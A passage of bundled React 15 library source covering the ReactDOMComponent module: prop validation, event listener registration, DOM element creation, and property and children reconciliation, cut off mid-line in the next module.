https://fb.me/react-invariant-dangerously-set-inner-html for more information.') : _prodInvariant('61') : void 0;\n  }\n  if (\"development\" !== 'production') {\n    \"development\" !== 'production' ? warning(props.innerHTML == null, 'Directly setting property `innerHTML` is not permitted. ' + 'For more information, lookup documentation on `dangerouslySetInnerHTML`.') : void 0;\n    \"development\" !== 'production' ? warning(props.suppressContentEditableWarning || !props.contentEditable || props.children == null, 'A component is `contentEditable` and contains `children` managed by ' + 'React. It is now your responsibility to guarantee that none of ' + 'those nodes are unexpectedly modified or duplicated. This is ' + 'probably not intentional.') : void 0;\n    \"development\" !== 'production' ? warning(props.onFocusIn == null && props.onFocusOut == null, 'React uses onFocus and onBlur instead of onFocusIn and onFocusOut. ' + 'All React events are normalized to bubble, so onFocusIn and onFocusOut ' + 'are not needed/supported by React.') : void 0;\n  }\n  !(props.style == null || typeof props.style === 'object') ? \"development\" !== 'production' ? invariant(false, 'The `style` prop expects a mapping from style properties to values, not a string. For example, style={{marginRight: spacing + \\'em\\'}} when using JSX.%s', getDeclarationErrorAddendum(component)) : _prodInvariant('62', getDeclarationErrorAddendum(component)) : void 0;\n}\n\nfunction enqueuePutListener(inst, registrationName, listener, transaction) {\n  if (transaction instanceof ReactServerRenderingTransaction) {\n    return;\n  }\n  if (\"development\" !== 'production') {\n    // IE8 has no API for event capturing and the `onScroll` event doesn't\n    // bubble.\n    \"development\" !== 'production' ? warning(registrationName !== 'onScroll' || isEventSupported('scroll', true), \"This browser doesn't support the `onScroll` event\") : void 0;\n  }\n  var containerInfo = inst._hostContainerInfo;\n  var isDocumentFragment = containerInfo._node && containerInfo._node.nodeType === DOC_FRAGMENT_TYPE;\n  var doc = isDocumentFragment ? containerInfo._node : containerInfo._ownerDocument;\n  listenTo(registrationName, doc);\n  transaction.getReactMountReady().enqueue(putListener, {\n    inst: inst,\n    registrationName: registrationName,\n    listener: listener\n  });\n}\n\nfunction putListener() {\n  var listenerToPut = this;\n  EventPluginHub.putListener(listenerToPut.inst, listenerToPut.registrationName, listenerToPut.listener);\n}\n\nfunction inputPostMount() {\n  var inst = this;\n  ReactDOMInput.postMountWrapper(inst);\n}\n\nfunction textareaPostMount() {\n  var inst = this;\n  ReactDOMTextarea.postMountWrapper(inst);\n}\n\nfunction optionPostMount() {\n  var inst = this;\n  ReactDOMOption.postMountWrapper(inst);\n}\n\nvar setAndValidateContentChildDev = emptyFunction;\nif (\"development\" !== 'production') {\n  setAndValidateContentChildDev = function (content) {\n    var hasExistingContent = this._contentDebugID != null;\n    var debugID = this._debugID;\n    // This ID represents the inlined child that has no backing instance:\n    var contentDebugID = -debugID;\n\n    if (content == null) {\n      if (hasExistingContent) {\n        ReactInstrumentation.debugTool.onUnmountComponent(this._contentDebugID);\n      }\n      this._contentDebugID = null;\n      return;\n    }\n\n    validateDOMNesting(null, String(content), this, this._ancestorInfo);\n    this._contentDebugID = contentDebugID;\n    if (hasExistingContent) {\n      ReactInstrumentation.debugTool.onBeforeUpdateComponent(contentDebugID, content);\n      ReactInstrumentation.debugTool.onUpdateComponent(contentDebugID);\n    } else {\n      ReactInstrumentation.debugTool.onBeforeMountComponent(contentDebugID, content, debugID);\n      ReactInstrumentation.debugTool.onMountComponent(contentDebugID);\n      ReactInstrumentation.debugTool.onSetChildren(debugID, [contentDebugID]);\n    }\n  };\n}\n\n// There are so many media events, it makes sense to just\n// maintain a list rather than create a `trapBubbledEvent` for each\nvar mediaEvents = {\n  topAbort: 'abort',\n  topCanPlay: 'canplay',\n  topCanPlayThrough: 'canplaythrough',\n  topDurationChange: 'durationchange',\n  topEmptied: 'emptied',\n  topEncrypted: 'encrypted',\n  topEnded: 'ended',\n  topError: 'error',\n  topLoadedData: 'loadeddata',\n  topLoadedMetadata: 'loadedmetadata',\n  topLoadStart: 'loadstart',\n  topPause: 'pause',\n  topPlay: 'play',\n  topPlaying: 'playing',\n  topProgress: 'progress',\n  topRateChange: 'ratechange',\n  topSeeked: 'seeked',\n  topSeeking: 'seeking',\n  topStalled: 'stalled',\n  topSuspend: 'suspend',\n  topTimeUpdate: 'timeupdate',\n  topVolumeChange: 'volumechange',\n  topWaiting: 'waiting'\n};\n\nfunction trackInputValue() {\n  inputValueTracking.track(this);\n}\n\nfunction trapBubbledEventsLocal() {\n  var inst = this;\n  // If a component renders to null or if another component fatals and causes\n  // the state of the tree to be corrupted, `node` here can be null.\n  !inst._rootNodeID ? \"development\" !== 'production' ? invariant(false, 'Must be mounted to trap events') : _prodInvariant('63') : void 0;\n  var node = getNode(inst);\n  !node ? \"development\" !== 'production' ? invariant(false, 'trapBubbledEvent(...): Requires node to be rendered.') : _prodInvariant('64') : void 0;\n\n  switch (inst._tag) {\n    case 'iframe':\n    case 'object':\n      inst._wrapperState.listeners = [ReactBrowserEventEmitter.trapBubbledEvent('topLoad', 'load', node)];\n      break;\n    case 'video':\n    case 'audio':\n      inst._wrapperState.listeners = [];\n      // Create listener for each media event\n      for (var event in mediaEvents) {\n        if (mediaEvents.hasOwnProperty(event)) {\n          inst._wrapperState.listeners.push(ReactBrowserEventEmitter.trapBubbledEvent(event, mediaEvents[event], node));\n        }\n      }\n      break;\n    case 'source':\n      inst._wrapperState.listeners = [ReactBrowserEventEmitter.trapBubbledEvent('topError', 'error', node)];\n      break;\n    case 'img':\n      inst._wrapperState.listeners = [ReactBrowserEventEmitter.trapBubbledEvent('topError', 'error', node), ReactBrowserEventEmitter.trapBubbledEvent('topLoad', 'load', node)];\n      break;\n    case 'form':\n      inst._wrapperState.listeners = [ReactBrowserEventEmitter.trapBubbledEvent('topReset', 'reset', node), ReactBrowserEventEmitter.trapBubbledEvent('topSubmit', 'submit', node)];\n      break;\n    case 'input':\n    case 'select':\n    case 'textarea':\n      inst._wrapperState.listeners = [ReactBrowserEventEmitter.trapBubbledEvent('topInvalid', 'invalid', node)];\n      break;\n  }\n}\n\nfunction postUpdateSelectWrapper() {\n  ReactDOMSelect.postUpdateWrapper(this);\n}\n\n// For HTML, certain tags should omit their close tag. We keep a whitelist for\n// those special-case tags.\n\nvar omittedCloseTags = {\n  area: true,\n  base: true,\n  br: true,\n  col: true,\n  embed: true,\n  hr: true,\n  img: true,\n  input: true,\n  keygen: true,\n  link: true,\n  meta: true,\n  param: true,\n  source: true,\n  track: true,\n  wbr: true\n  // NOTE: menuitem's close tag should be omitted, but that causes problems.\n};\n\nvar newlineEatingTags = {\n  listing: true,\n  pre: true,\n  textarea: true\n};\n\n// For HTML, certain tags cannot have children. This has the same purpose as\n// `omittedCloseTags` except that `menuitem` should still have its closing tag.\n\nvar voidElementTags = _assign({\n  menuitem: true\n}, omittedCloseTags);\n\n// We accept any tag to be rendered but since this gets injected into arbitrary\n// HTML, we want to make sure that it's a safe tag.\n// http://www.w3.org/TR/REC-xml/#NT-Name\n\nvar VALID_TAG_REGEX = /^[a-zA-Z][a-zA-Z:_\\.\\-\\d]*$/; // Simplified subset\nvar validatedTagCache = {};\nvar hasOwnProperty = {}.hasOwnProperty;\n\nfunction validateDangerousTag(tag) {\n  if (!hasOwnProperty.call(validatedTagCache, tag)) {\n    !VALID_TAG_REGEX.test(tag) ? \"development\" !== 'production' ? invariant(false, 'Invalid tag: %s', tag) : _prodInvariant('65', tag) : void 0;\n    validatedTagCache[tag] = true;\n  }\n}\n\nfunction isCustomComponent(tagName, props) {\n  return tagName.indexOf('-') >= 0 || props.is != null;\n}\n\nvar globalIdCounter = 1;\n\n/**\n * Creates a new React class that is idempotent and capable of containing other\n * React components. It accepts event listeners and DOM properties that are\n * valid according to `DOMProperty`.\n *\n *  - Event listeners: `onClick`, `onMouseDown`, etc.\n *  - DOM properties: `className`, `name`, `title`, etc.\n *\n * The `style` property functions differently from the DOM API. It accepts an\n * object mapping of style properties to values.\n *\n * @constructor ReactDOMComponent\n * @extends ReactMultiChild\n */\nfunction ReactDOMComponent(element) {\n  var tag = element.type;\n  validateDangerousTag(tag);\n  this._currentElement = element;\n  this._tag = tag.toLowerCase();\n  this._namespaceURI = null;\n  this._renderedChildren = null;\n  this._previousStyle = null;\n  this._previousStyleCopy = null;\n  this._hostNode = null;\n  this._hostParent = null;\n  this._rootNodeID = 0;\n  this._domID = 0;\n  this._hostContainerInfo = null;\n  this._wrapperState = null;\n  this._topLevelWrapper = null;\n  this._flags = 0;\n  if (\"development\" !== 'production') {\n    this._ancestorInfo = null;\n    setAndValidateContentChildDev.call(this, null);\n  }\n}\n\nReactDOMComponent.displayName = 'ReactDOMComponent';\n\nReactDOMComponent.Mixin = {\n  /**\n   * Generates root tag markup then recurses. This method has side effects and\n   * is not idempotent.\n   *\n   * @internal\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @param {?ReactDOMComponent} the parent component instance\n   * @param {?object} info about the host container\n   * @param {object} context\n   * @return {string} The computed markup.\n   */\n  mountComponent: function (transaction, hostParent, hostContainerInfo, context) {\n    this._rootNodeID = globalIdCounter++;\n    this._domID = hostContainerInfo._idCounter++;\n    this._hostParent = hostParent;\n    this._hostContainerInfo = hostContainerInfo;\n\n    var props = this._currentElement.props;\n\n    switch (this._tag) {\n      case 'audio':\n      case 'form':\n      case 'iframe':\n      case 'img':\n      case 'link':\n      case 'object':\n      case 'source':\n      case 'video':\n        this._wrapperState = {\n          listeners: null\n        };\n        transaction.getReactMountReady().enqueue(trapBubbledEventsLocal, this);\n        break;\n      case 'input':\n        ReactDOMInput.mountWrapper(this, props, hostParent);\n        props = ReactDOMInput.getHostProps(this, props);\n        transaction.getReactMountReady().enqueue(trackInputValue, this);\n        transaction.getReactMountReady().enqueue(trapBubbledEventsLocal, this);\n        break;\n      case 'option':\n        ReactDOMOption.mountWrapper(this, props, hostParent);\n        props = ReactDOMOption.getHostProps(this, props);\n        break;\n      case 'select':\n        ReactDOMSelect.mountWrapper(this, props, hostParent);\n        props = ReactDOMSelect.getHostProps(this, props);\n        transaction.getReactMountReady().enqueue(trapBubbledEventsLocal, this);\n        break;\n      case 'textarea':\n        ReactDOMTextarea.mountWrapper(this, props, hostParent);\n        props = ReactDOMTextarea.getHostProps(this, props);\n        transaction.getReactMountReady().enqueue(trackInputValue, this);\n        transaction.getReactMountReady().enqueue(trapBubbledEventsLocal, this);\n        break;\n    }\n\n    assertValidProps(this, props);\n\n    // We create tags in the namespace of their parent container, except HTML\n    // tags get no namespace.\n    var namespaceURI;\n    var parentTag;\n    if (hostParent != null) {\n      namespaceURI = hostParent._namespaceURI;\n      parentTag = hostParent._tag;\n    } else if (hostContainerInfo._tag) {\n      namespaceURI = hostContainerInfo._namespaceURI;\n      parentTag = hostContainerInfo._tag;\n    }\n    if (namespaceURI == null || namespaceURI === DOMNamespaces.svg && parentTag === 'foreignobject') {\n      namespaceURI = DOMNamespaces.html;\n    }\n    if (namespaceURI === DOMNamespaces.html) {\n      if (this._tag === 'svg') {\n        namespaceURI = DOMNamespaces.svg;\n      } else if (this._tag === 'math') {\n        namespaceURI = DOMNamespaces.mathml;\n      }\n    }\n    this._namespaceURI = namespaceURI;\n\n    if (\"development\" !== 'production') {\n      var parentInfo;\n      if (hostParent != null) {\n        parentInfo = hostParent._ancestorInfo;\n      } else if (hostContainerInfo._tag) {\n        parentInfo = hostContainerInfo._ancestorInfo;\n      }\n      if (parentInfo) {\n        // parentInfo should always be present except for the top-level\n        // component when server rendering\n        validateDOMNesting(this._tag, null, this, parentInfo);\n      }\n      this._ancestorInfo = validateDOMNesting.updatedAncestorInfo(parentInfo, this._tag, this);\n    }\n\n    var mountImage;\n    if (transaction.useCreateElement) {\n      var ownerDocument = hostContainerInfo._ownerDocument;\n      var el;\n      if (namespaceURI === DOMNamespaces.html) {\n        if (this._tag === 'script') {\n          // Create the script via .innerHTML so its \"parser-inserted\" flag is\n          // set to true and it does not execute\n          var div = ownerDocument.createElement('div');\n          var type = this._currentElement.type;\n          div.innerHTML = '<' + type + '></' + type + '>';\n          el = div.removeChild(div.firstChild);\n        } else if (props.is) {\n          el = ownerDocument.createElement(this._currentElement.type, props.is);\n        } else {\n          // Separate else branch instead of using `props.is || undefined` above becuase of a Firefox bug.\n          // See discussion in https://github.com/facebook/react/pull/6896\n          // and discussion in https://bugzilla.mozilla.org/show_bug.cgi?id=1276240\n          el = ownerDocument.createElement(this._currentElement.type);\n        }\n      } else {\n        el = ownerDocument.createElementNS(namespaceURI, this._currentElement.type);\n      }\n      ReactDOMComponentTree.precacheNode(this, el);\n      this._flags |= Flags.hasCachedChildNodes;\n      if (!this._hostParent) {\n        DOMPropertyOperations.setAttributeForRoot(el);\n      }\n      this._updateDOMProperties(null, props, transaction);\n      var lazyTree = DOMLazyTree(el);\n      this._createInitialChildren(transaction, props, context, lazyTree);\n      mountImage = lazyTree;\n    } else {\n      var tagOpen = this._createOpenTagMarkupAndPutListeners(transaction, props);\n      var tagContent = this._createContentMarkup(transaction, props, context);\n      if (!tagContent && omittedCloseTags[this._tag]) {\n        mountImage = tagOpen + '/>';\n      } else {\n        mountImage = tagOpen + '>' + tagContent + '</' + this._currentElement.type + '>';\n      }\n    }\n\n    switch (this._tag) {\n      case 'input':\n        transaction.getReactMountReady().enqueue(inputPostMount, this);\n        if (props.autoFocus) {\n          transaction.getReactMountReady().enqueue(AutoFocusUtils.focusDOMComponent, this);\n        }\n        break;\n      case 'textarea':\n        transaction.getReactMountReady().enqueue(textareaPostMount, this);\n        if (props.autoFocus) {\n          transaction.getReactMountReady().enqueue(AutoFocusUtils.focusDOMComponent, this);\n        }\n        break;\n      case 'select':\n        if (props.autoFocus) {\n          transaction.getReactMountReady().enqueue(AutoFocusUtils.focusDOMComponent, this);\n        }\n        break;\n      case 'button':\n        if (props.autoFocus) {\n          transaction.getReactMountReady().enqueue(AutoFocusUtils.focusDOMComponent, this);\n        }\n        break;\n      case 'option':\n        transaction.getReactMountReady().enqueue(optionPostMount, this);\n        break;\n    }\n\n    return mountImage;\n  },\n\n  /**\n   * Creates markup for the open tag and all attributes.\n   *\n   * This method has side effects because events get registered.\n   *\n   * Iterating over object properties is faster than iterating over arrays.\n   * @see http://jsperf.com/obj-vs-arr-iteration\n   *\n   * @private\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @param {object} props\n   * @return {string} Markup of opening tag.\n   */\n  _createOpenTagMarkupAndPutListeners: function (transaction, props) {\n    var ret = '<' + this._currentElement.type;\n\n    for (var propKey in props) {\n      if (!props.hasOwnProperty(propKey)) {\n        continue;\n      }\n      var propValue = props[propKey];\n      if (propValue == null) {\n        continue;\n      }\n      if (registrationNameModules.hasOwnProperty(propKey)) {\n        if (propValue) {\n          enqueuePutListener(this, propKey, propValue, transaction);\n        }\n      } else {\n        if (propKey === STYLE) {\n          if (propValue) {\n            if (\"development\" !== 'production') {\n              // See `_updateDOMProperties`. style block\n              this._previousStyle = propValue;\n            }\n            propValue = this._previousStyleCopy = _assign({}, props.style);\n          }\n          propValue = CSSPropertyOperations.createMarkupForStyles(propValue, this);\n        }\n        var markup = null;\n        if (this._tag != null && isCustomComponent(this._tag, props)) {\n          if (!RESERVED_PROPS.hasOwnProperty(propKey)) {\n            markup = DOMPropertyOperations.createMarkupForCustomAttribute(propKey, propValue);\n          }\n        } else {\n          markup = DOMPropertyOperations.createMarkupForProperty(propKey, propValue);\n        }\n        if (markup) {\n          ret += ' ' + markup;\n        }\n      }\n    }\n\n    // For static pages, no need to put React ID and checksum. Saves lots of\n    // bytes.\n    if (transaction.renderToStaticMarkup) {\n      return ret;\n    }\n\n    if (!this._hostParent) {\n      ret += ' ' + DOMPropertyOperations.createMarkupForRoot();\n    }\n    ret += ' ' + DOMPropertyOperations.createMarkupForID(this._domID);\n    return ret;\n  },\n\n  /**\n   * Creates markup for the content between the tags.\n   *\n   * @private\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @param {object} props\n   * @param {object} context\n   * @return {string} Content markup.\n   */\n  _createContentMarkup: function (transaction, props, context) {\n    var ret = '';\n\n    // Intentional use of != to avoid catching zero/false.\n    var innerHTML = props.dangerouslySetInnerHTML;\n    if (innerHTML != null) {\n      if (innerHTML.__html != null) {\n        ret = innerHTML.__html;\n      }\n    } else {\n      var contentToUse = CONTENT_TYPES[typeof props.children] ? props.children : null;\n      var childrenToUse = contentToUse != null ? null : props.children;\n      if (contentToUse != null) {\n        // TODO: Validate that text is allowed as a child of this node\n        ret = escapeTextContentForBrowser(contentToUse);\n        if (\"development\" !== 'production') {\n          setAndValidateContentChildDev.call(this, contentToUse);\n        }\n      } else if (childrenToUse != null) {\n        var mountImages = this.mountChildren(childrenToUse, transaction, context);\n        ret = mountImages.join('');\n      }\n    }\n    if (newlineEatingTags[this._tag] && ret.charAt(0) === '\\n') {\n      // text/html ignores the first character in these tags if it's a newline\n      // Prefer to break application/xml over text/html (for now) by adding\n      // a newline specifically to get eaten by the parser. (Alternately for\n      // textareas, replacing \"^\\n\" with \"\\r\\n\" doesn't get eaten, and the first\n      // \\r is normalized out by HTMLTextAreaElement#value.)\n      // See: <http://www.w3.org/TR/html-polyglot/#newlines-in-textarea-and-pre>\n      // See: <http://www.w3.org/TR/html5/syntax.html#element-restrictions>\n      // See: <http://www.w3.org/TR/html5/syntax.html#newlines>\n      // See: Parsing of \"textarea\" \"listing\" and \"pre\" elements\n      //  from <http://www.w3.org/TR/html5/syntax.html#parsing-main-inbody>\n      return '\\n' + ret;\n    } else {\n      return ret;\n    }\n  },\n\n  _createInitialChildren: function (transaction, props, context, lazyTree) {\n    // Intentional use of != to avoid catching zero/false.\n    var innerHTML = props.dangerouslySetInnerHTML;\n    if (innerHTML != null) {\n      if (innerHTML.__html != null) {\n        DOMLazyTree.queueHTML(lazyTree, innerHTML.__html);\n      }\n    } else {\n      var contentToUse = CONTENT_TYPES[typeof props.children] ? props.children : null;\n      var childrenToUse = contentToUse != null ? null : props.children;\n      // TODO: Validate that text is allowed as a child of this node\n      if (contentToUse != null) {\n        // Avoid setting textContent when the text is empty. In IE11 setting\n        // textContent on a text area will cause the placeholder to not\n        // show within the textarea until it has been focused and blurred again.\n        // https://github.com/facebook/react/issues/6731#issuecomment-254874553\n        if (contentToUse !== '') {\n          if (\"development\" !== 'production') {\n            setAndValidateContentChildDev.call(this, contentToUse);\n          }\n          DOMLazyTree.queueText(lazyTree, contentToUse);\n        }\n      } else if (childrenToUse != null) {\n        var mountImages = this.mountChildren(childrenToUse, transaction, context);\n        for (var i = 0; i < mountImages.length; i++) {\n          DOMLazyTree.queueChild(lazyTree, mountImages[i]);\n        }\n      }\n    }\n  },\n\n  /**\n   * Receives a next element and updates the component.\n   *\n   * @internal\n   * @param {ReactElement} nextElement\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @param {object} context\n   */\n  receiveComponent: function (nextElement, transaction, context) {\n    var prevElement = this._currentElement;\n    this._currentElement = nextElement;\n    this.updateComponent(transaction, prevElement, nextElement, context);\n  },\n\n  /**\n   * Updates a DOM component after it has already been allocated and\n   * attached to the DOM. Reconciles the root DOM node, then recurses.\n   *\n   * @param {ReactReconcileTransaction} transaction\n   * @param {ReactElement} prevElement\n   * @param {ReactElement} nextElement\n   * @internal\n   * @overridable\n   */\n  updateComponent: function (transaction, prevElement, nextElement, context) {\n    var lastProps = prevElement.props;\n    var nextProps = this._currentElement.props;\n\n    switch (this._tag) {\n      case 'input':\n        lastProps = ReactDOMInput.getHostProps(this, lastProps);\n        nextProps = ReactDOMInput.getHostProps(this, nextProps);\n        break;\n      case 'option':\n        lastProps = ReactDOMOption.getHostProps(this, lastProps);\n        nextProps = ReactDOMOption.getHostProps(this, nextProps);\n        break;\n      case 'select':\n        lastProps = ReactDOMSelect.getHostProps(this, lastProps);\n        nextProps = ReactDOMSelect.getHostProps(this, nextProps);\n        break;\n      case 'textarea':\n        lastProps = ReactDOMTextarea.getHostProps(this, lastProps);\n        nextProps = ReactDOMTextarea.getHostProps(this, nextProps);\n        break;\n    }\n\n    assertValidProps(this, nextProps);\n    this._updateDOMProperties(lastProps, nextProps, transaction);\n    this._updateDOMChildren(lastProps, nextProps, transaction, context);\n\n    switch (this._tag) {\n      case 'input':\n        // Update the wrapper around inputs *after* updating props. This has to\n        // happen after `_updateDOMProperties`. Otherwise HTML5 input validations\n        // raise warnings and prevent the new value from being assigned.\n        ReactDOMInput.updateWrapper(this);\n        break;\n      case 'textarea':\n        ReactDOMTextarea.updateWrapper(this);\n        break;\n      case 'select':\n        // <select> value update needs to occur after <option> children\n        // reconciliation\n        transaction.getReactMountReady().enqueue(postUpdateSelectWrapper, this);\n        break;\n    }\n  },\n\n  /**\n   * Reconciles the properties by detecting differences in property values and\n   * updating the DOM as necessary. This function is probably the single most\n   * critical path for performance optimization.\n   *\n   * TODO: Benchmark whether checking for changed values in memory actually\n   *       improves performance (especially statically positioned elements).\n   * TODO: Benchmark the effects of putting this at the top since 99% of props\n   *       do not change for a given reconciliation.\n   * TODO: Benchmark areas that can be improved with caching.\n   *\n   * @private\n   * @param {object} lastProps\n   * @param {object} nextProps\n   * @param {?DOMElement} node\n   */\n  _updateDOMProperties: function (lastProps, nextProps, transaction) {\n    var propKey;\n    var styleName;\n    var styleUpdates;\n    for (propKey in lastProps) {\n      if (nextProps.hasOwnProperty(propKey) || !lastProps.hasOwnProperty(propKey) || lastProps[propKey] == null) {\n        continue;\n      }\n      if (propKey === STYLE) {\n        var lastStyle = this._previousStyleCopy;\n        for (styleName in lastStyle) {\n          if (lastStyle.hasOwnProperty(styleName)) {\n            styleUpdates = styleUpdates || {};\n            styleUpdates[styleName] = '';\n          }\n        }\n        this._previousStyleCopy = null;\n      } else if (registrationNameModules.hasOwnProperty(propKey)) {\n        if (lastProps[propKey]) {\n          // Only call deleteListener if there was a listener previously or\n          // else willDeleteListener gets called when there wasn't actually a\n          // listener (e.g., onClick={null})\n          deleteListener(this, propKey);\n        }\n      } else if (isCustomComponent(this._tag, lastProps)) {\n        if (!RESERVED_PROPS.hasOwnProperty(propKey)) {\n          DOMPropertyOperations.deleteValueForAttribute(getNode(this), propKey);\n        }\n      } else if (DOMProperty.properties[propKey] || DOMProperty.isCustomAttribute(propKey)) {\n        DOMPropertyOperations.deleteValueForProperty(getNode(this), propKey);\n      }\n    }\n    for (propKey in nextProps) {\n      var nextProp = nextProps[propKey];\n      var lastProp = propKey === STYLE ? this._previousStyleCopy : lastProps != null ? lastProps[propKey] : undefined;\n      if (!nextProps.hasOwnProperty(propKey) || nextProp === lastProp || nextProp == null && lastProp == null) {\n        continue;\n      }\n      if (propKey === STYLE) {\n        if (nextProp) {\n          if (\"development\" !== 'production') {\n            checkAndWarnForMutatedStyle(this._previousStyleCopy, this._previousStyle, this);\n            this._previousStyle = nextProp;\n          }\n          nextProp = this._previousStyleCopy = _assign({}, nextProp);\n        } else {\n          this._previousStyleCopy = null;\n        }\n        if (lastProp) {\n          // Unset styles on `lastProp` but not on `nextProp`.\n          for (styleName in lastProp) {\n            if (lastProp.hasOwnProperty(styleName) && (!nextProp || !nextProp.hasOwnProperty(styleName))) {\n              styleUpdates = styleUpdates || {};\n              styleUpdates[styleName] = '';\n            }\n          }\n          // Update styles that changed since `lastProp`.\n          for (styleName in nextProp) {\n            if (nextProp.hasOwnProperty(styleName) && lastProp[styleName] !== nextProp[styleName]) {\n              styleUpdates = styleUpdates || {};\n              styleUpdates[styleName] = nextProp[styleName];\n            }\n          }\n        } else {\n          // Relies on `updateStylesByID` not mutating `styleUpdates`.\n          styleUpdates = nextProp;\n        }\n      } else if (registrationNameModules.hasOwnProperty(propKey)) {\n        if (nextProp) {\n          enqueuePutListener(this, propKey, nextProp, transaction);\n        } else if (lastProp) {\n          deleteListener(this, propKey);\n        }\n      } else if (isCustomComponent(this._tag, nextProps)) {\n        if (!RESERVED_PROPS.hasOwnProperty(propKey)) {\n          DOMPropertyOperations.setValueForAttribute(getNode(this), propKey, nextProp);\n        }\n      } else if (DOMProperty.properties[propKey] || DOMProperty.isCustomAttribute(propKey)) {\n        var node = getNode(this);\n        // If we're updating to null or undefined, we should remove the property\n        // from the DOM node instead of inadvertently setting to a string. This\n        // brings us in line with the same behavior we have on initial render.\n        if (nextProp != null) {\n          DOMPropertyOperations.setValueForProperty(node, propKey, nextProp);\n        } else {\n          DOMPropertyOperations.deleteValueForProperty(node, propKey);\n        }\n      }\n    }\n    if (styleUpdates) {\n      CSSPropertyOperations.setValueForStyles(getNode(this), styleUpdates, this);\n    }\n  },\n\n  /**\n   * Reconciles the children with the various properties that affect the\n   * children content.\n   *\n   * @param {object} lastProps\n   * @param {object} nextProps\n   * @param {ReactReconcileTransaction} transaction\n   * @param {object} context\n   */\n  _updateDOMChildren: function (lastProps, nextProps, transaction, context) {\n    var lastContent = CONTENT_TYPES[typeof lastProps.children] ? lastProps.children : null;\n    var nextContent = CONTENT_TYPES[typeof nextProps.children] ? nextProps.children : null;\n\n    var lastHtml = lastProps.dangerouslySetInnerHTML && lastProps.dangerouslySetInnerHTML.__html;\n    var nextHtml = nextProps.dangerouslySetInnerHTML && nextProps.dangerouslySetInnerHTML.__html;\n\n    // Note the use of `!=` which checks for null or undefined.\n    var lastChildren = lastContent != null ? null : lastProps.children;\n    var nextChildren = nextContent != null ? null : nextProps.children;\n\n    // If we're switching from children to content/html or vice versa, remove\n    // the old content\n    var lastHasContentOrHtml = lastContent != null || lastHtml != null;\n    var nextHasContentOrHtml = nextContent != null || nextHtml != null;\n    if (lastChildren != null && nextChildren == null) {\n      this.updateChildren(null, transaction, context);\n    } else if (lastHasContentOrHtml && !nextHasContentOrHtml) {\n      this.updateTextContent('');\n      if (\"development\" !== 'production') {\n        ReactInstrumentation.debugTool.onSetChildren(this._debugID, []);\n      }\n    }\n\n    if (nextContent != null) {\n      if (lastContent !== nextContent) {\n        this.updateTextContent('' + nextContent);\n        if (\"development\" !== 'production') {\n          setAndValidateContentChildDev.call(this, nextContent);\n        }\n      }\n    } else if (nextHtml != null) {\n      if (lastHtml !== nextHtml) {\n        this.updateMarkup('' + nextHtml);\n      }\n      if (\"development\" !== 'production') {\n        ReactInstrumentation.debugTool.onSetChildren(this._debugID, []);\n      }\n    } else if (nextChildren != null) {\n      if (\"development\" !== 'production') {\n        setAndValidateContentChildDev.call(this, null);\n      }\n\n      this.updateChildren(nextChildren, transaction, context);\n    }\n  },\n\n  getHostNode: function () {\n    return getNode(this);\n  },\n\n  /**\n   * Destroys all event registrations for this instance. Does not remove from\n   * the DOM. That must be done by the parent.\n   *\n   * @internal\n   */\n  unmountComponent: function (safely) {\n    switch (this._tag) {\n      case 'audio':\n      case 'form':\n      case 'iframe':\n      case 'img':\n      case 'link':\n      case 'object':\n      case 'source':\n      case 'video':\n        var listeners = this._wrapperState.listeners;\n        if (listeners) {\n          for (var i = 0; i < listeners.length; i++) {\n            listeners[i].remove();\n          }\n        }\n        break;\n      case 'input':\n      case 'textarea':\n        inputValueTracking.stopTracking(this);\n        break;\n      case 'html':\n      case 'head':\n      case 'body':\n        /**\n         * Components like <html> <head> and <body> can't be removed or added\n         * easily in a cross-browser way, however it's valuable to be able to\n         * take advantage of React's reconciliation for styling and <title>\n         * management. So we just document it and throw in dangerous cases.\n         */\n        !false ? \"development\" !== 'production' ? invariant(false, '<%s> tried to unmount. Because of cross-browser quirks it is impossible to unmount some top-level components (eg <html>, <head>, and <body>) reliably and efficiently. To fix this, have a single top-level component that never unmounts render these elements.', this._tag) : _prodInvariant('66', this._tag) : void 0;\n        break;\n    }\n\n    this.unmountChildren(safely);\n    ReactDOMComponentTree.uncacheNode(this);\n    EventPluginHub.deleteAllListeners(this);\n    this._rootNodeID = 0;\n    this._domID = 0;\n    this._wrapperState = null;\n\n    if (\"development\" !== 'production') {\n      setAndValidateContentChildDev.call(this, null);\n    }\n  },\n\n  getPublicInstance: function () {\n    return getNode(this);\n  }\n};\n\n_assign(ReactDOMComponent.prototype, ReactDOMComponent.Mixin, ReactMultiChild.Mixin);\n\nmodule.exports = ReactDOMComponent;\n},{\"10\":10,\"107\":107,\"11\":11,\"12\":12,\"120\":120,\"122\":122,\"126\":126,\"132\":132,\"144\":144,\"152\":152,\"158\":158,\"159\":159,\"160\":160,\"17\":17,\"18\":18,\"2\":2,\"26\":26,\"33\":33,\"34\":34,\"39\":39,\"42\":42,\"43\":43,\"46\":46,\"5\":5,\"64\":64,\"68\":68,\"77\":77,\"9\":9}],33:[function(_dereq_,module,exports){\n/**\n * Copyright 2015-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactDOMComponentFlags = {\n  hasCachedChildNodes: 1 << 0\n};\n\nmodule.exports = ReactDOMComponentFlags;\n},{}],34:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar DOMProperty = _dereq_(11);\nvar ReactDOMComponentFlags = _dereq_(33);\n\nvar invariant = _dereq_(152);\n\nvar ATTR_NAME = DOMProperty.ID_ATTRIBUTE_NAME;\nvar Flags = ReactDOMComponentFlags;\n\nvar internalInstanceKey = '__reactInternalInstance$' + Math.random().toString(36).slice(2);\n\n/**\n * Check if a given node should be cached.\n */\nfunction shouldPrecacheNode(node, nodeID) {\n  return node.nodeType === 1 && node.getAttribute(ATTR_NAME) === String(nodeID) || node.nodeType === 8 && node.nodeValue === ' react-text: ' + nodeID + ' ' || node.nodeType === 8 && node.nodeValue === ' react-empty: ' + 